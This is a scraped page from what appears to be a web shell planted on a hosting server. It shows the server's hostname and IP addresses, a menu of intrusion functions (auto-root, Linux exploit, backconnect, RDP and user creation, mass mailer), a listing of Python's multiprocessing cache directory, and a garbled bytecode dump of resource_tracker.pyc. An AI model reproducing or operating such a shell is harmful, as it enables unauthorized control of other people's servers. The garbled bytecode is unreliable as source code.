Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.100.74
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
multiprocessing /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
669
B
-rw-r--r--
connection.cpython-310.pyc
24.97
KB
-rw-r--r--
context.cpython-310.pyc
12.55
KB
-rw-r--r--
forkserver.cpython-310.pyc
8.23
KB
-rw-r--r--
heap.cpython-310.pyc
7.49
KB
-rw-r--r--
managers.cpython-310.pyc
39.81
KB
-rw-r--r--
pool.cpython-310.pyc
24.61
KB
-rw-r--r--
popen_fork.cpython-310.pyc
2.46
KB
-rw-r--r--
popen_forkserver.cpython-310.p...
2.41
KB
-rw-r--r--
popen_spawn_posix.cpython-310....
2.29
KB
-rw-r--r--
popen_spawn_win32.cpython-310....
3.39
KB
-rw-r--r--
process.cpython-310.pyc
11
KB
-rw-r--r--
queues.cpython-310.pyc
10.04
KB
-rw-r--r--
reduction.cpython-310.pyc
8.1
KB
-rw-r--r--
resource_sharer.cpython-310.py...
5.18
KB
-rw-r--r--
resource_tracker.cpython-310.p...
5.36
KB
-rw-r--r--
shared_memory.cpython-310.pyc
14.14
KB
-rw-r--r--
sharedctypes.cpython-310.pyc
6.93
KB
-rw-r--r--
spawn.cpython-310.pyc
6.58
KB
-rw-r--r--
synchronize.cpython-310.pyc
11.06
KB
-rw-r--r--
util.cpython-310.pyc
11.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resource_tracker.cpython-310.pyc
o }�5h # � @ s� d dl Z d dlZd dlZd dlZd dlZddlmZ ddlmZ g d�Ze ed�Z ejejfZ ddd � iZe jd krWd dlZd dlZe ed�rOe�deji� e�d eji� G dd� de�Ze� ZejZejZejZejZdd� ZdS )� N� )�spawn)�util)�ensure_running�register� unregister�pthread_sigmask�noopc C s d S �N� r r r �7/usr/lib/python3.10/multiprocessing/resource_tracker.py�<lambda>! s r �posix� sem_unlink� semaphore� shared_memoryc @ sL e Zd Zdd� Zdd� Zdd� Zdd� Zd d � Zdd� Zd d� Z dd� Z dS )�ResourceTrackerc C s t �� | _d | _d | _d S r )� threading�Lock�_lock�_fd�_pid��selfr r r �__init__8 s zResourceTracker.__init__c C sn | j �* | jd u r W d � d S t�| j� d | _t�| jd� d | _W d � d S 1 s0w Y d S )Nr )r r �os�close�waitpidr r r r r �_stop= s �"�zResourceTracker._stopc C s | � � | jS r )r r r r r r �getfdJ s zResourceTracker.getfdc C s� | j �� | jdur?| �� r W d � dS t�| j� z| jdur)t�| jd� W n ty3 Y nw d| _d| _t� d� g }z |� tj� � � W n tyT Y nw d}t�� \}}zXzA|� |� t�� }|gt�� }|d|| g7 }ztr�t�tjt� t�|||�}W tr�t�tjt� ntr�t�tjt� w w W n t�|� � || _|| _W t�|� nt�|� w W d � dS 1 s�w Y dS )z�Make sure that resource tracker process is running. This can be run from any process. Usually a child process will use the resource created by its parent.Nr zUresource_tracker: process died unexpectedly, relaunching. Some resources might leak.z:from multiprocessing.resource_tracker import main;main(%d)z-c)r r �_check_aliver r r r �ChildProcessError�warnings�warn�append�sys�stderr�fileno� Exception�piper �get_executabler �_args_from_interpreter_flags� _HAVE_SIGMASK�signalr � SIG_BLOCK�_IGNORED_SIGNALS�spawnv_passfds�SIG_UNBLOCK)r �fds_to_pass�cmd�r�w�exe�args�pidr r r r N s^ � �� � ���� "�zResourceTracker.ensure_runningc C s* z t �| jd� W dS ty Y dS w )z;Check that the pipe has not been closed by sending a probe.s PROBE:0:noop FT)r �writer �OSErrorr r r r r � s ��zResourceTracker._check_alivec C � | � d||� dS )z0Register name of resource with resource tracker.�REGISTERN��_send�r �name�rtyper r r r � � zResourceTracker.registerc C r; )z2Unregister name of resource with resource tracker.� UNREGISTERNr= r? r r r r � rB zResourceTracker.unregisterc C sb | � � d�|||��d�}t|�dkrtd��t�| j|�}|t|�ks/J d�|t|����d S )Nz{0}:{1}:{2} �asciii zmsg too longznbytes {0:n} but len(msg) {1:n})r �format�encode�len� ValueErrorr r9 r )r r3 r@ rA �msg�nbytesr r r r>